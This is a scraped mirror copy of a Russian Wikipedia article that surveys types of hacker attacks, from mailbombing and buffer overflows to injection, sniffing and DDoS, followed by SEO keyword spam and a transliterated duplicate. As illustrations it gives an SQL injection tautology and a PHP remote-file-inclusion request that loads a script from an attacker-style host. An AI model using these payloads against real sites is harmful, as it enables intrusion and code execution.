Википедия

Хакерская атака

Хакерская атака в узком смысле слова — в настоящее время под словосочетанием понимается «Покушение на систему безопасности», и склоняется скорее к смыслу следующего термина Крэкерская атака. Это произошло из-за искажения смысла самого слова «хакер».

Хакерская атака в широком смысле слова (изначальный смысл) — мозговой штурм направленный на нахождение пути решения сложных задач. В хакерской атаке могут принимать участие один или несколько высококлассных специалистов (хакеров). В результате мозгового штурма могут быть придуманы нетрадиционные методы решения проблемы, или внесены оптимизирующие корректировки в уже существующие методы.

Крэкерская атака — действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании.

Mailbombing (SMTP)

Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом.

Переполнение буфера

Пожалуй, один из самых распространённых типов атак в Интернете. Принцип данной атаки построен на использовании программных ошибок, позволяющих вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права.

Вирусы, троянские программы, черви, снифферы, руткиты и другие специальные программы

Следующий вид атаки представляет собой более изощрённый метод получения доступа к закрытой информации — использование специальных программ для ведения работы на компьютере жертвы, а также дальнейшего распространения (это вирусы и черви). Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны.

Сетевая разведка

В ходе такой атаки крэкер собственно не производит никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.

В ходе такой разведки злоумышленник может производить сканирование портов, запросы DNS, открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей.

Сниффинг пакетов

Также довольно распространённый вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемому сниффером. В результате злоумышленник может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.

IP-спуфинг

Тоже распространённый вид атаки в недостаточно защищённых сетях, когда злоумышленник выдаёт себя за санкционированного пользователя, находясь в самой организации или за её пределами. Для этого крэкеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений.

Man-in-the-Middle

Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне злоумышленник может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки — незаконное получение, кража или фальсифицирование передаваемой информации или же получение несанкционированного доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации.

Инъекция кода

Семейство атак, объединённых одним общим принципом — в результате атаки данные выполняются как код.

SQL-инъекция — атака, в ходе которой изменяются параметры SQL-запросов к базе данных. В результате запрос приобретает совершенно иной смысл и в случае недостаточной фильтрации входных данных способен не только произвести вывод конфиденциальной информации, но и изменить/удалить данные. Очень часто такой вид атаки можно наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае — переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.

SELECT fieldlist FROM table WHERE id = 23 OR 1=1;

Вместо проверки можно подставить утверждение,
которое, будучи истинным, позволит обойти проверку

PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный злонамеренный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости как неэкранированные переменные, получающие внешние значения. Например, старая уязвимость форума используется хакерами запросом: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.

Межсайтовый скриптинг или XSS (аббр. от англ.  Cross Site Scripting, не путать с CSS (Cascade Style Sheet)) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript.

XPath-инъекция — вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных.

Автозалив — веб-инъекция, действующая по принципу троянских программ, основная цель которой заключается во внедрении в аккаунт пользователя в платежной системе, незаметной подмене данных транзакции путём модификации HTML-кода и переводе средств пользователя на счёт злоумышленника.

Социальная инженерия

Социальная инженерия (от англ. social engineering) — использование некомпетентности, непрофессионализма или небрежности персонала для получения доступа к информации. Этот метод обычно применяется без компьютера, с использованием обычного телефона или почтовой переписки. Таким образом обычно получается самая разнообразная информация. В ходе такой атаки злоумышленник устанавливает контакт с жертвой, и, вводя её в заблуждение либо войдя в доверие, пытается получить необходимые сведения, которые сложно получить другим путём, либо другие пути являются более рискованными.

Отказ в обслуживании

DoS (от англ. Denial of Service — Отказ в обслуживании) — атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своём коде могут вызывать исключительные ситуации и при отключении сервисов способны исполнять код, предоставленный злоумышленником, или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.

DDoS (от англ. Distributed Denial of Service — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель, что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS-атаку на систему жертвы. Вместе это называется DDoS-атака. Размер ботнета может составлять от нескольких десятков до нескольких сотен тысяч компьютеров.

Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм крэкера и ценность информации, а также недостаточная компетенция администратора системы безопасности, в частности, несовершенство программного обеспечения и недостаточное внимание к вопросам безопасности в компании в целом.

См. также

Примечания

  1. SQL Injection Attacks by Example Архивная копия от 7 ноября 2015 на Wayback Machine (англ.)

Ссылки

  • Web Application Security Consortium: Классификация угроз
  • Случаи кибератак
  • Информационная безопасность для всех — Защита от хакерских атак (недоступная ссылка)
  • Пример хакерской инъекции
  • [1]Введение в XPath-инъекции
  • [2]Устранение опасности XPath-внедрения
  • [3]Белый хакер

Википедия, чтение, книга, библиотека, поиск, нажмите, истории, книги, статьи, wikipedia, учить, информация, история, скачать, скачать бесплатно, mp3, видео, mp4, 3gp, jpg, jpeg, gif, png, картинка, музыка, песня, фильм, игра, игры, мобильный, телефон, Android, iOS, apple, мобильный телефон, Samsung, iphone, xiomi, xiaomi, redmi, honor, oppo, nokia, sonya, mi, ПК, web, Сеть, компьютер, Информация о Хакерская атака, Что такое Хакерская атака? Что означает Хакерская атака?

Hakerskaya ataka v uzkom smysle slova v nastoyashee vremya pod slovosochetaniem ponimaetsya Pokushenie na sistemu bezopasnosti i sklonyaetsya skoree k smyslu sleduyushego termina Krekerskaya ataka Eto proizoshlo iz za iskazheniya smysla samogo slova haker Hakerskaya ataka v shirokom smysle slova iznachalnyj smysl mozgovoj shturm napravlennyj na nahozhdenie puti resheniya slozhnyh zadach V hakerskoj atake mogut prinimat uchastie odin ili neskolko vysokoklassnyh specialistov hakerov V rezultate mozgovogo shturma mogut byt pridumany netradicionnye metody resheniya problemy ili vneseny optimiziruyushie korrektirovki v uzhe sushestvuyushie metody Krekerskaya ataka dejstvie celyu kotorogo yavlyaetsya zahvat kontrolya povyshenie prav nad udalyonnoj lokalnoj vychislitelnoj sistemoj libo eyo destabilizaciya libo otkaz v obsluzhivanii Mailbombing SMTP Schitaetsya samym starym metodom atak hotya sut ego prosta i primitivna bolshoe kolichestvo pochtovyh soobshenij delayut nevozmozhnymi rabotu s pochtovymi yashikami a inogda i s celymi pochtovymi serverami Dlya etoj celi bylo razrabotano mnozhestvo programm i dazhe neopytnyj polzovatel mog sovershit ataku ukazav vsego lish e mail zhertvy tekst soobsheniya i kolichestvo neobhodimyh soobshenij Mnogie takie programmy pozvolyali pryatat realnyj IP adres otpravitelya ispolzuya dlya rassylki anonimnyj pochtovyj server Etu ataku slozhno predotvratit tak kak dazhe pochtovye filtry provajderov ne mogut opredelit realnogo otpravitelya spama Provajder mozhet ogranichit kolichestvo pisem ot odnogo otpravitelya no adres otpravitelya i tema zachastuyu generiruyutsya sluchajnym obrazom Perepolnenie buferaPozhaluj odin iz samyh rasprostranyonnyh tipov atak v Internete Princip dannoj ataki postroen na ispolzovanii programmnyh oshibok pozvolyayushih vyzvat narushenie granic pamyati i avarijno zavershit prilozhenie ili vypolnit proizvolnyj binarnyj kod ot imeni polzovatelya pod kotorym rabotala uyazvimaya programma Esli programma rabotaet pod uchyotnoj zapisyu administratora sistemy to dannaya ataka pozvolit poluchit polnyj kontrol nad kompyuterom zhertvy poetomu rekomenduetsya rabotat pod uchyotnoj zapisyu ryadovogo polzovatelya imeyushego ogranichennye prava na sisteme a pod uchyotnoj zapisyu administratora sistemy vypolnyat tolko operacii trebuyushie administrativnye prava Virusy troyanskie programmy chervi sniffery rutkity i drugie specialnye programmySleduyushij vid ataki predstavlyaet soboj bolee izoshryonnyj metod polucheniya dostupa k zakrytoj informacii ispolzovanie specialnyh programm dlya vedeniya raboty na kompyutere zhertvy a takzhe dalnejshego rasprostraneniya eto virusy i chervi Takie programmy prednaznacheny dlya poiska i peredachi svoemu vladelcu sekretnoj informacii libo prosto dlya naneseniya vreda sisteme bezopasnosti i rabotosposobnosti kompyutera zhertvy Principy dejstviya etih programm razlichny Setevaya razvedkaOsnovnaya statya Setevaya razvedka V hode takoj ataki kreker sobstvenno ne proizvodit nikakih destruktivnyh dejstvij no v rezultate on mozhet poluchit zakrytuyu informaciyu o postroenii i principah funkcionirovaniya vychislitelnoj sistemy zhertvy Poluchennaya informaciya mozhet byt ispolzovana dlya gramotnogo postroeniya predstoyashej ataki i obychno proizvoditsya na podgotovitelnyh etapah V hode takoj razvedki zloumyshlennik mozhet proizvodit skanirovanie portov zaprosy DNS otkrytyh portov nalichie i zashishyonnost proksi serverov V rezultate mozhno poluchit informaciyu o sushestvuyushih v sisteme DNS adresah komu oni prinadlezhat kakie servisy na nih dostupny uroven dostupa k etim servisam dlya vneshnih i vnutrennih polzovatelej Sniffing paketovTakzhe dovolno rasprostranyonnyj vid ataki osnovannyj na rabote setevoj karty v rezhime promiscuous mode a takzhe monitor mode dlya setej Wi Fi V takom rezhime vse pakety poluchennye setevoj kartoj peresylayutsya na obrabotku specialnomu prilozheniyu nazyvaemomu snifferom V rezultate zloumyshlennik mozhet poluchit bolshoe kolichestvo sluzhebnoj informacii kto otkuda i kuda peredaval pakety cherez kakie adresa eti pakety prohodili Samoj bolshoj opasnostyu takoj ataki yavlyaetsya poluchenie samoj informacii naprimer loginov i parolej sotrudnikov kotorye mozhno ispolzovat dlya nezakonnogo proniknoveniya v sistemu pod vidom obychnogo sotrudnika kompanii IP spufingTozhe rasprostranyonnyj vid ataki v nedostatochno zashishyonnyh setyah kogda zloumyshlennik vydayot sebya za sankcionirovannogo polzovatelya nahodyas v samoj organizacii ili za eyo predelami Dlya etogo krekeru neobhodimo vospolzovatsya IP adresom razreshyonnym v sisteme bezopasnosti seti Takaya ataka vozmozhna esli sistema bezopasnosti pozvolyaet identifikaciyu polzovatelya tolko po IP adresu i ne trebuet dopolnitelnyh podtverzhdenij Man in the MiddleVid ataki kogda zloumyshlennik perehvatyvaet kanal svyazi mezhdu dvumya sistemami i poluchaet dostup ko vsej peredavaemoj informacii Pri poluchenii dostupa na takom urovne zloumyshlennik mozhet modificirovat informaciyu nuzhnym emu obrazom chtoby dostich svoih celej Cel takoj ataki nezakonnoe poluchenie krazha ili falsificirovanie peredavaemoj informacii ili zhe poluchenie nesankcionirovannogo dostupa k resursam seti Takie ataki krajne slozhno otsledit tak kak obychno zloumyshlennik nahoditsya vnutri organizacii Inekciya kodaSemejstvo atak obedinyonnyh odnim obshim principom v rezultate ataki dannye vypolnyayutsya kak kod SQL inekciya ataka v hode kotoroj izmenyayutsya parametry SQL zaprosov k baze dannyh V rezultate zapros priobretaet sovershenno inoj smysl i v sluchae nedostatochnoj filtracii vhodnyh dannyh sposoben ne tolko proizvesti vyvod konfidencialnoj informacii no i izmenit udalit dannye Ochen chasto takoj vid ataki mozhno nablyudat na primere sajtov kotorye ispolzuyut parametry komandnoj stroki v dannom sluchae peremennye URL dlya postroeniya SQL zaprosov k bazam dannyh bez sootvetstvuyushej proverki SELECT fieldlist FROM table WHERE id 23 OR 1 1 Vmesto proverki mozhno podstavit utverzhdenie kotoroe buduchi istinnym pozvolit obojti proverku Osnovnaya statya Vnedrenie SQL koda PHP inekciya odin iz sposobov vzloma veb sajtov rabotayushih na PHP On zaklyuchaetsya v tom chtoby vnedrit specialno sformirovannyj zlonamerennyj scenarij v kod veb prilozheniya na servernoj storone sajta chto privodit k vypolneniyu proizvolnyh komand Izvestno chto vo mnogih rasprostranyonnyh v internete besplatnyh dvizhkah i forumah rabotayushih na PHP chashe vsego eto ustarevshie versii est neprodumannye moduli ili otdelnye konstrukcii s uyazvimostyami Krekery analiziruyut takie uyazvimosti kak neekranirovannye peremennye poluchayushie vneshnie znacheniya Naprimer staraya uyazvimost foruma ispolzuetsya hakerami zaprosom GET modules threadstop threadstop php new exbb home path evilhackerscorp com tx txt Mezhsajtovyj skripting ili XSS abbr ot angl Cross Site Scripting ne putat s CSS Cascade Style Sheet tip uyazvimostej obychno obnaruzhivaemyh v veb prilozheniyah kotorye pozvolyayut vnedryat kod zlonamerennym polzovatelyam v veb stranicy prosmatrivaemye drugimi polzovatelyami Primerami takogo koda yavlyayutsya HTML kod i skripty vypolnyayushiesya na storone klienta chashe vsego JavaScript XPath inekciya vid uyazvimostej kotoryj zaklyuchaetsya vo vnedrenii XPath vyrazhenij v originalnyj zapros k baze dannyh XML Kak i pri ostalnyh vidah inekcij uyazvimost vozmozhna vvidu nedostatochnoj proverki vhodnyh dannyh Avtozaliv veb inekciya dejstvuyushaya po principu troyanskih programm osnovnaya cel kotoroj zaklyuchaetsya vo vnedrenii v akkaunt polzovatelya v platezhnoj sisteme nezametnoj podmene dannyh tranzakcii putyom modifikacii HTML koda i perevode sredstv polzovatelya na schyot zloumyshlennika Socialnaya inzheneriyaSocialnaya inzheneriya ot angl social engineering ispolzovanie nekompetentnosti neprofessionalizma ili nebrezhnosti personala dlya polucheniya dostupa k informacii Etot metod obychno primenyaetsya bez kompyutera s ispolzovaniem obychnogo telefona ili pochtovoj perepiski Takim obrazom obychno poluchaetsya samaya raznoobraznaya informaciya V hode takoj ataki zloumyshlennik ustanavlivaet kontakt s zhertvoj i vvodya eyo v zabluzhdenie libo vojdya v doverie pytaetsya poluchit neobhodimye svedeniya kotorye slozhno poluchit drugim putyom libo drugie puti yavlyayutsya bolee riskovannymi Otkaz v obsluzhivaniiOsnovnaya statya DoS ataka DoS ot angl Denial of Service Otkaz v obsluzhivanii ataka imeyushaya svoej celyu zastavit server ne otvechat na zaprosy Takoj vid ataki ne podrazumevaet poluchenie nekotoroj sekretnoj informacii no inogda byvaet podsporem v inicializacii drugih atak Naprimer nekotorye programmy iz za oshibok v svoyom kode mogut vyzyvat isklyuchitelnye situacii i pri otklyuchenii servisov sposobny ispolnyat kod predostavlennyj zloumyshlennikom ili ataki lavinnogo tipa kogda server ne mozhet obrabotat ogromnoe kolichestvo vhodyashih paketov DDoS ot angl Distributed Denial of Service Raspredelennaya DoS podtip DoS ataki imeyushij tu zhe cel chto i DoS no proizvodimoj ne s odnogo kompyutera a s neskolkih kompyuterov v seti V dannyh tipah atak ispolzuetsya libo vozniknovenie oshibok privodyashih k otkazu servisa libo srabatyvanie zashity privodyashej k blokirovaniyu raboty servisa a v rezultate takzhe k otkazu v obsluzhivanii DDoS ispolzuetsya tam gde obychnyj DoS neeffektiven Dlya etogo neskolko kompyuterov obedinyayutsya i kazhdyj proizvodit DoS ataku na sistemu zhertvy Vmeste eto nazyvaetsya DDoS ataka Razmer botneta mozhet sostavlyat ot neskolkih desyatkov do neskolkih soten tysyach kompyuterov Lyubaya ataka predstavlyaet soboj ne chto inoe kak popytku ispolzovat nesovershenstvo sistemy bezopasnosti zhertvy libo dlya polucheniya informacii libo dlya naneseniya vreda sisteme poetomu prichinoj lyuboj udachnoj ataki yavlyaetsya professionalizm krekera i cennost informacii a takzhe nedostatochnaya kompetenciya administratora sistemy bezopasnosti v chastnosti nesovershenstvo programmnogo obespecheniya i nedostatochnoe vnimanie k voprosam bezopasnosti v kompanii v celom Sm takzheInformacionnaya bezopasnost Intrusion Countermeasure Electronics Kreker Haker Udalyonnye setevye ataki Anonimus Ataki kanalnogo urovnyaPrimechaniyaSQL Injection Attacks by Example Arhivnaya kopiya ot 7 noyabrya 2015 na Wayback Machine angl SsylkiHakerskie ataki v VikinovostyahWeb Application Security Consortium Klassifikaciya ugroz Sluchai kiberatak Informacionnaya bezopasnost dlya vseh Zashita ot hakerskih atak nedostupnaya ssylka Primer hakerskoj inekcii 1 Vvedenie v XPath inekcii 2 Ustranenie opasnosti XPath vnedreniya 3 Belyj hakerV state ne hvataet ssylok na istochniki sm rekomendacii po poisku Informaciya dolzhna byt proveryaema inache ona mozhet byt udalena Vy mozhete otredaktirovat statyu dobaviv ssylki na avtoritetnye istochniki v vide snosok 4 marta 2012

NiNa.Az

NiNa.Az - Абсолютно бесплатная система, которая делится для вас информацией и контентом 24 часа в сутки.
Взгляните
Закрыто